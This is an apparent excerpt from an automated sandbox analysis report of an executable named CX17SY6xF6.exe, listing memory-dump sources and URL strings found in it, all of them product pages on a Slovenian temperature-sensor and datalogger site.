                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/prenosna-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/temperaturna-tipala-predhodna-sifr
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/wireless-temperaturna-tipala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/zunanja-in-prostorska-temperaturna
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/dodatna-oprema-za-da
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/osnovni-dataloggerji
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/precizni-dataloggerj
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/tehnoloski-data-logg
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/veckanalni-in-s-tisk
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/web-brezzicni-wifi-r
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dodatna-oprema-za-termometre-logg
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/ex-termometri-in-dataloggerji/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/
